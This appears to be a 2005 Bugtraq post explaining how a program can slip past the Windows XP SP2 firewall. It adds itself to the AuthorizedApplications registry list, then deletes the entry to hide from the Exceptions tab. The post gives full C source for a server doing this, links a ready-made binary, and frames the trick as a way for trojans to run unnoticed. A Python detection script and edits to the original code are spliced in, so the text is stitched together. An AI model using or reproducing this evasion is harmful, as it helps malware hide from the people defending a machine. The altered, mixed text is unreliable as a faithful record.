anti Windows XP SP2 firewall trick

crusoe_at_alexandria.cc
Date: 09/07/05

    Date: 7 Sep 2005 20:34:50 -0000
    To: bugtraq@securityfocus.com

    1.9.2005
    Mark Kica
    crusoe@alexandria.cc
    FEI AI Technical University Kosice
    #Dedicated to Katka H. from Levoca

         How to avoid detection of a server application by the Windows XP SP2 firewall

    ###############################################################################
    #Q:How safe is Windows XP SP2 firewall ?
    #A:Not very...

     This trick uses only modification of registry keys. The Windows XP SP2 firewall keeps
    a list of allowed programs in the registry, and programs on that list are not blocked. If
    you add a new entry to it, your server (malware or trojan) can run freely.

    The server can also be made invisible in the following list:

    start->control panel->windows firewall->exceptions

    It disappears from this list because, once the socket has been created, you can remove
    the registry string value for your server and the connection will not be aborted.

    Another way to bypass the SP2 firewall is to write the trojan not as a server but
    as a client.

    ##################################################################

    http://taekwondo-itf.szm.sk/bugg.zip

    Test :

    #c:\bugg.exe Server running on port 2001

    connect to server with :

    #telnet localhost 2001

    ##################################################################

    Our registry path is

    HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List

    and there you create a string value (the value name is the full path of the executable;
    the data is path, scope, state and display name separated by colons):

    Value name ........ Value

    C:\chat.exe ........ C:\chat.exe:*:Enabled:chat

    NO SPACES!!! in the value name etc. _C:\chat.exe___
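As an added defender-side example (not code from the original post), the following Python parses the value format described above from `reg query`-style lines and compares two reads of the list, so that an entry which appears and then vanishes once its socket is up, or one whose value name does not match its path field, stands out. The sample lines are constructed, not a real capture.

```python
import re
from dataclasses import dataclass
from typing import Dict, List, Tuple

# Value format under ...\FirewallPolicy\StandardProfile\AuthorizedApplications\List:
#     <value name> = "<path>:<scope>:<Enabled|Disabled>:<display name>"
# The path itself contains a colon (drive letter), so fields are split from the right.
LINE_RE = re.compile(r"^\s*(.*?)\s+REG_SZ\s+(.*?)\s*$")

# Constructed samples in the layout of `reg query` output (not real captures). The second
# read is taken moments later: chat.exe has vanished and a name/path mismatch has appeared.
SNAPSHOT_BEFORE = r"""
    C:\Program Files\Messenger\msmsgs.exe    REG_SZ    C:\Program Files\Messenger\msmsgs.exe:*:Enabled:Windows Messenger
    C:\chat.exe    REG_SZ    C:\chat.exe:*:Enabled:chat
"""
SNAPSHOT_AFTER = r"""
    C:\Program Files\Messenger\msmsgs.exe    REG_SZ    C:\Program Files\Messenger\msmsgs.exe:*:Enabled:Windows Messenger
    C:\update.exe    REG_SZ    C:\temp\svc.exe:*:Enabled:update
"""

@dataclass(frozen=True)
class Entry:
    name: str   # registry value name; the post notes it must equal the path, no spaces
    path: str
    scope: str  # '*' = any remote address
    state: str  # 'Enabled' or 'Disabled'
    label: str  # display name shown in the Exceptions tab

def parse_list(text: str) -> Dict[str, Entry]:
    """Parse 'name  REG_SZ  data' lines into entries keyed by value name."""
    entries: Dict[str, Entry] = {}
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue  # blank lines and the key header carry no value
        name, data = m.group(1), m.group(2)
        parts = data.rsplit(":", 3)
        if len(parts) != 4:
            continue  # not in the documented four-field format
        entries[name] = Entry(name, *parts)
    return entries

def suspicious(entries: Dict[str, Entry]) -> List[str]:
    """Value names whose path field differs from the name (breaks the expected invariant)."""
    return sorted(e.name for e in entries.values() if e.name != e.path)

def diff_snapshots(before: Dict[str, Entry], after: Dict[str, Entry]) -> Tuple[List[str], List[str]]:
    """(added, removed) value names between two reads; a short-lived entry shows up here."""
    return sorted(set(after) - set(before)), sorted(set(before) - set(after))
```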

    #################################################################
    Tested on Windows XP Media Center Edition 2005 with integrated SP2

    Source code
    (the server uses the ezsocket lib)

    #include <stdio.h>
    #include <string.h>
    #include <windows.h>
    #include <ezsocket.h>
    #include <conio.h>
    #include "Shlwapi.h"

    #define FW_LIST_KEY "SYSTEM\\CurrentControlSet\\Services\\SharedAccess\\Parameters\\FirewallPolicy\\StandardProfile\\AuthorizedApplications\\List"

    int main( int argc, char *argv [] )
        {
        char buffer[1024];
        char filename[1024];
        char fwvalue[1100];   /* "<path>:*:Enabled:bugg", kept apart from the I/O buffer */

        HKEY hKey;
        int temp, sockfd, new_fd, fd_size;
        struct sockaddr_in remote_addr;

        /* full path of this executable: it is both the value name and the path field */
        GetModuleFileName(NULL, filename, sizeof(filename));

        strcpy(fwvalue, filename);
        strcat(fwvalue, ":*:Enabled:");
        strcat(fwvalue, "bugg");

        /* writing under HKLM needs administrative rights */
        if (RegOpenKeyEx(HKEY_LOCAL_MACHINE, FW_LIST_KEY, 0, KEY_ALL_ACCESS, &hKey) != ERROR_SUCCESS)
            {
            fprintf(stderr, "RegOpenKeyEx failed\n");
            return 1;
            }

        /* add this program to the firewall's authorized application list */
        RegSetValueEx(hKey, filename, 0, REG_SZ, (const BYTE *)fwvalue, (DWORD)strlen(fwvalue) + 1);

        fprintf(stdout, "Simple server example with Anti SP2 firewall trick \n");
        fprintf(stdout, " This is not trojan \n");
        fprintf(stdout, " Opened port is :2001 \n");
        fprintf(stdout, "author:Mark Kica student of Technical University Kosice\n");
        fprintf(stdout, "Dedicated to Katka H. from Levoca \n");

        Sleep(3000);   /* Win32 Sleep() takes milliseconds */

        if ((sockfd = ezsocket(NULL, NULL, 2001, SERVER)) == -1)
            {
            RegCloseKey(hKey);
            return 0;
            }

        for (; ; )
            {
            /* the socket is already listening: deleting the value hides the entry in the
               Exceptions tab without dropping the connection */
            RegDeleteValue(hKey, filename);
            fd_size = sizeof(struct sockaddr_in);

            if ((new_fd = accept(sockfd, (struct sockaddr *)&remote_addr, &fd_size)) == -1)
                {
                perror("accept");
                continue;
                }
            temp = send(new_fd, "Hello World\r\n", strlen("Hello World\r\n"), 0);
            fprintf(stdout, "Sent: Hello World\r\n");
            temp = recv(new_fd, buffer, sizeof(buffer) - 1, 0);   /* leave room for the terminator */
            if (temp < 0)
                temp = 0;
            buffer[temp] = '\0';
            fprintf(stdout, "Received: %s\r\n", buffer);
            ezclose_socket(new_fd);
            /* restore the entry (the original wrote the received data here by mistake) */
            RegSetValueEx(hKey, filename, 0, REG_SZ, (const BYTE *)fwvalue, (DWORD)strlen(fwvalue) + 1);

            if (!strcmp(buffer, "quit"))
                break;
            }

        RegCloseKey(hKey);
        ezsocket_exit();
        return 0;
        }
      

